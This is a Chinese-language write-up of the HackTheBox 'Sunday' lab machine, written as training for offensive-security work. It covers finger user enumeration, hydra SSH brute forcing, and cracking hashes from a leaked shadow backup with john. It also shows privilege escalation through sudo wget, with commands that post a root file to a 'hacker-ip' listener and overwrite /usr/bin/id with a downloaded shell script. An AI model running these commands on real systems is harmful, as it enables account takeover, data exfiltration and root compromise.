0%

HackTheBox-Sunday

OSCP like

20210409-11:16:48-_0el9SC_fEug4T

(22022是ssh端口,图没截到

20210409-11:16:14-_Hg6K6s_23OX1N

79是finger,可以枚举到系统上到用户名

1
2
[email protected]: sammy                 console      <Sep 30, 2020>..
[email protected]: sunny pts/3 <Apr 24, 2018> 10.10.14.4 ..

ssh破密

1
hydra -l sunny -P rockyou.txt -s 22022 ssh://sunday.htb -t 4

sunny:sunday

20210409-11:19:29-_E57ad3_MZIELD

1
2
3
[email protected]:~$ sudo /root/troll
testing
uid=0(root) gid=0(root)

看输出结果像是执行了id命令,sudo没有配置安全环境变量,尝试环境变量提权,但失败。猜测写死了执行路径。

信息收集后,发现/backup/shadow.backup文件。

1
2
3
4
5
6
7
8
9
10
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

john破解。

1
sudo john hash --wordlist=rockyou.txt

20210409-11:23:47-_ZVqFLo_a3F4tV

20210409-11:24:30-_msErj0_2N44O9

sudo wget方法有两个

  • post-file #上传本地文件到攻击者
  • download-file #下载任意文件到本地

首先我这里尝试了往shadow,和passwd中添加多一个弱密码到后门用户,但是有su root的角色限制。不成功。

最后才想起sunny还能sudo /root/troll

vim a.sh

1
2
3
#!/usr/bin/bash

bash
1
sudo wget -O /root/troll http://hacker-ip/a.sh

虽然成功了,但是没用。猜测是有个脚本执行还原动作。

因为troll是会执行id的

1
2
3
nc -lvnp 81

sudo wget --post-file /root/troll hacker-ip

20210409-11:29:33-_MkjyOy_Xr2bRG

用恶意脚本a.sh覆盖/usr/bin/id

1
sudo wget -O /usr/bin/id  http://hacker-ip/a.sh

接着用sunny用户执行sudo /root/troll

20210409-11:31:51-_s5cp04_Bdk99G